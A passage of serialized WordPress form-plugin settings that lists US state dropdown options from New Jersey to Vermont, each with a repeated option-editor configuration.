Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:30;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Jersey\";s:5:\"value\";s:2:\"NJ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"30\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:31;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"New Mexico\";s:5:\"value\";s:2:\"NM\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"31\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:32;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"New York\";s:5:\"value\";s:2:\"NY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"32\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:33;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"North Carolina\";s:5:\"value\";s:2:\"NC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"33\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:34;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"North Dakota\";s:5:\"value\";s:2:\"ND\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"34\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:35;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Ohio\";s:5:\"value\";s:2:\"OH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"35\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:36;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Oklahoma\";s:5:\"value\";s:2:\"OK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"36\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:37;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Oregon\";s:5:\"value\";s:2:\"OR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"37\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:38;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Pennsylvania\";s:5:\"value\";s:2:\"PA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"38\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:39;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"Rhode Island\";s:5:\"value\";s:2:\"RI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"39\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:40;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"South Carolina\";s:5:\"value\";s:2:\"SC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"40\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:41;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:12:\"South Dakota\";s:5:\"value\";s:2:\"SD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"41\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:42;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Tennessee\";s:5:\"value\";s:2:\"TN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"42\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:43;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"43\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"44\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"45\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 